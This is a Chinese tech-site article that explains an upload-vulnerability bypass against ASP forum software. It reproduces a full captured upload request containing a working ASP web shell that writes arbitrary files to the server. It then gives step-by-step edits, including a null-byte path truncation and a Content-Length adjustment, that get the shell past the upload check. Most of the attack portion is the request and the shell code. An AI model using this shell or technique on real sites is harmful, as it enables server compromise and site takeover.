51CTO首页
AI.x社区
博客
学堂
精品班
软考社区
免费课
企业培训
鸿蒙开发者社区
WOT技术大会
IT证书
公众号矩阵
移动端
短视频免费课程课程排行直播课软考学堂
全部课程厂商认证IT技术24年11月软考PMP项目管理免费题库
在线学习
文章资源问答课堂专栏直播
51CTO
鸿蒙开发者社区
51CTO技术栈
51CTO官微
51CTO学堂
51CTO博客
CTO训练营
鸿蒙开发者社区订阅号
51CTO软考
51CTO学堂APP
51CTO学堂企业版APP
鸿蒙开发者社区视频号
51CTO软考题库
账号设置 退出

解析上传漏洞欺骗技术

作者:佚名
安全 黑客攻防
先我们要获得客户端和服务器之间传递的数据,事先准备好一个ASP木马准备上传,当然不可能成功,我们要的就是这中间我们向服务器提交的数据。一般用WsockExpert来获得数据,由于数据太多只能把关键部分发出来

实际上网络中存在着很多的漏洞,通过这些漏洞的利用黑客就可能会入侵网站的服务器,取得管理员权限。其中不少的程序都存在着上传漏洞,通过上传漏洞黑客入侵者便可以上传一个ASP木马,然后通过上传漏洞欺骗技术来达到自己入侵的目的。接下来本篇文章就讲分析一下上传漏洞欺骗的具体原理。

POST /bbs/upfile.asp HTTP/1.1

……. 省略了N多没用信息

 

  1. Content-Length: 1792  
  2. Connection: Keep-Alive  
  3. Cache-Control: no-cache  
  4. Cookie: ASPSESSIONIDQQTDTATD=NLDNNHPDJEEHOFNFBAGPOJKN 
  5. -----------------------------7d52191850242  
  6. Content-Disposition: form-data; name="filepath" 
  7.  
  8. uploadFace  
  9. -----------------------------7d52191850242  
  10. Content-Disposition: form-data; name="act" 
  11.  
  12. upload  
  13. -----------------------------7d52191850242  
  14. Content-Disposition: form-data; name="file1"
  15. filename="E:\木马\asp\shell.asp" 
  16. Content-Type: text/plain  
  17.  
  18. <% dim objFSO %>  
  19. <% dim fdata %>  
  20. <% dim objCountFile %>  
  21. <% on error resume next %>  
  22. <% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>  
  23. <% if Trim(request("syfdpath"))<>"" then %>  
  24. <% fdata = request("cyfddata") %>  
  25. <% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>  
  26. <% objCountFile.Write fdata %>  
  27. <% if err =0 then %>  
  28. <% response.write "<font color=red><h2>成功!</h2><font>" %>  
  29. <% else %>  
  30. <% response.write "<font color=red><h1>失败!</h1></font>" %>  
  31. <% end if %>  
  32. <% err.clear %>  
  33. <% end if %>  
  34. <% objCountFile.Close %>  
  35. <% Set objCountFile=Nothing %>  
  36. <% Set objFSO = Nothing %>  
  37. <% Response.write "<form action='' method=post>" %>  
  38. <% Response.write "保存留言<font color=red>如D:\web\x.asp</font>" %>  
  39. <% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>  
  40. <% Response.Write "<br>" %>  
  41. <% Response.write "地址来自" %>  
  42. <% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>  
  43. <% Response.write "<br>" %>  
  44. <% Response.write "你的留言:" %>  
  45. <% Response.write "<textarea name=cyfddata
  46. cols=80 rows=10 width=32></textarea>" %>  
  47. <% Response.write "<input type=submit value=sky!!>" %>  
  48. <% Response.write "</form>" %> 

-----------------------------7d52191850242

Content-Disposition: form-data; name="fname"

E:\木马\asp\shell.asp

-----------------------------7d52191850242

Content-Disposition: form-data; name="Submit"

上传
-----------------------------7d52191850242--

传递的信息我们获取了,下面就来修改下达到上传漏洞欺骗目的。主要修改一下几点:

1.Content-Disposition: form-data; name="file1"; filename="E:\木马\asp\shell.asp"

2.Content-Disposition: form-data; name="fname"

E:\木马\asp\shell.asp

3.最重要的地方是Content-Disposition: form-data; name="filepath"下面的值要修改下。我们修改成uploadFace\shell.asp后面怎么加一个空字符呢?用UltraEdit是个好方法,用16进制编辑,(因为'\0'这个字符也占一个位置,所以我们先打入一空格,然后再在UltraEdit(用Ctrl+H转换到16进制模式下)里将就空格符的20改成00)。

4.还有一个地方也要修改,就是这句Content-Length: 1792表示提交数据的字符个数。

如果你修改了filepath的值那么这个长度1792也要变换,一个字母或者数字的长度就是1,不要忘记最后面那个空格那个也算1。

【编辑推荐】

  1. 亲身体验MS07-029漏洞入侵
  2. 解析系统泄露密码入侵攻击
  3. 经典后门实例之线程插入后门
  4. 经典后门实例之扩展后门
  5. 通过数据库下载漏洞发起网络攻击

 

责任编辑:张启峰 来源: 安全在线
上传漏洞欺骗
相关推荐
深入解析ARP欺骗攻击
ARP(地址解析协议)是在仅知道主机的IP地址时确定其物理地址的一种协议。因IPv4和以太网的广泛应用,其主要用作将IP地址翻译为以太网的MAC地址,但其也能在ATM和FDDIIP网络中使用。本文将为大家详细剖析ARP欺骗,它主要分为双向欺骗和单向欺骗。

2013-04-01 10:12:39

实例解析Cookies欺骗原理
本文通过对6kbbs的网站进行Cookies欺骗为实例,向各位管理员和用户分析Cookies欺骗的原理和应用过程,使得管理员能够在日常网络安全维护中注意此种行为。

2010-09-13 16:24:39

利用IP地址欺骗突破防火墙深层技术解析
一般的访问控制主要在防火墙中进行设置,制定一些安全策略:如内部局域网的资源不允许外部网上的用户使用;不设防区(又称非军事区)能为内部或外部局域网,其中的资源允许外部网的用户有限度地使用;能使外部用户访问非军事区(DMZ区)的WEB服务器等等。看本文以下的的详细分析。

2011-04-18 13:33:07

无ARP欺骗嗅探技术
ARP欺骗的攻击和防御技术都比较成熟了,这里也不再阐述。此次重点讲解如何不用ARP欺骗进行嗅探以及会话劫持的技术原理,实际的攻击方法是进行MAC欺骗。

2009-12-17 10:14:14

ICMP/ARP协议解析及ARP欺骗
ICMP是TCPIP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。

2019-10-31 08:43:43

ICMPARP协议ARP欺骗
Microsoft WINS之域控制器欺骗漏洞
本文介绍了微软系统中受影响的系统出现域控制器欺骗漏洞进行测试的方法。

2011-07-13 13:43:30

浏览器地址栏欺骗漏洞背后
最近几个不同的Web浏览器出现地址栏欺骗漏洞。这些漏洞背后的问题是什么

2015-12-01 10:43:55

解析漏洞总结
IIS6.0解析利用方法有两种,目录解析和文件解析。

2013-09-04 10:41:08

关于Firefox浏览器JavaScript提示欺骗漏洞通知
天融信公司攻防实验室再次挖掘出MozillaFirefox浏览器中存在的两个严重的JavaScriptPromptSpoofing安全漏洞,远程攻击者可以通过构造欺骗信息获取用户敏感数据。据悉,此次天融信公司发现的安全漏洞影响几乎所有版本的Firefox浏览器,建议用户密切关注Firefox相关漏洞补丁,杜绝安全隐患。

2009-12-28 12:16:54

PHP漏洞全解(九)-文件上传漏洞
本文主要介绍针对PHP网站文件上传漏洞。由于文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型,导致允许攻击者向某个可通过Web访问的目录上传任意PHP文件,并能够将这些文件传递给PHP解释器,就可以在远程服务器上执行任意PHP脚本,即文件上传漏洞。

2012-04-12 16:05:50

无ARP欺骗的嗅探技术
ARP欺骗的攻击和防御技术都比较成熟了,这里也不再阐述。此次重点讲解如何不用ARP欺骗进行嗅探以及会话劫持的技术原理,实际的攻击方法是进行MAC欺骗。

2009-07-15 20:44:17

实例解析通过流量检测查找ARP欺骗
笔者的工作单位是一所学校,最近学校的一栋教学楼内的网络突然出现时断时好的现象,这可是严重影响了学校的正常教学和工作,情况危急,需要马上解决!

2010-09-16 16:06:37

深入解析ARP欺骗攻击防护之ARP
本文在介绍ARP欺骗攻击防护之前首先向大家了ARP的基本信息,以便大家查阅,帮助大家理解ARP。

2011-04-06 10:23:46

ARP欺骗和WPA2最新漏洞利用分析指南
最近《WPA2无线安全协议发现惊天漏洞!》这篇文章被疯狂转载,其原因都来自于AirTight的言论:由于一个被忽视的漏洞,WPA2“外强中干”,攻击者可以破解用WPA2加密的数据通信。果真如此令人恐慌吗?

2010-08-03 11:08:57

Apache解析漏洞详解
本文中,笔者针对“解析漏洞”进行了简单科普。

2013-11-29 15:41:08

解析漏洞ApacheApache解析漏洞
Cookie欺骗 腾讯拍拍秒杀活动的验证码漏洞
有谁还记得大概几年前突然出现了验证码这东西,许多网站甚至桌面应用程序都陆续实现了验证码技术,主要作用无非就是防止用户利用程序进行自动提交,避免暴力破解,避免服务器遭受恶意攻击。

2010-12-05 19:36:32

欺骗技术优于蜜罐的8个理由
最近两年,随着APT、内网威胁的迅速增长,攻击欺骗技术的检测能力的提升,攻击欺骗技术和传统蜜罐欺骗技术在检测网络攻击者方法上是存在一定的差异性,以下是它们的不同之处。

2018-10-29 07:13:45

维护基础设施,欺骗技术是关键
欺骗技术显然是安全堆栈中不可缺少的部分。将其添加到上游和下游安全控制中可减少与安全性设计和操作差距相关的风险,并提高安全团队对攻击者的入侵方式得到了解

2019-11-20 15:18:15

欺骗技术网络安全基础设施安全
DLL劫持漏洞解析
DLL劫持漏洞是通过一些手段来劫持或者替换正常的DLL,欺骗正常程序加载预先准备好的恶意DLL的一类漏洞的统称。利用DLL劫持漏洞,病毒木马可以随着文档的打开(或者其他一些程序正常行为)而激活自身,进而获得系统的控制权。

2013-06-25 10:11:18

深入解析ARP欺骗攻击防护之方法介绍
ARP欺骗攻击反复袭击,是近来网络行业普遍了解的现象,随着ARP攻击的不断升级,不同的解决方案在市场上流传。但是最近发现,有一些方案,从短期看来似乎有效,实际上对于真正的ARP攻击发挥不了作用,也降低局域网工作效率。很多公司的技术服务人员接到很多用户反应说有些ARP防制方法很容易操作和实施,但经过实际深入了解后,发现长期效果都不大。

2011-04-06 10:31:53

点赞
收藏

51CTO技术栈公众号

业务
速览
在线客服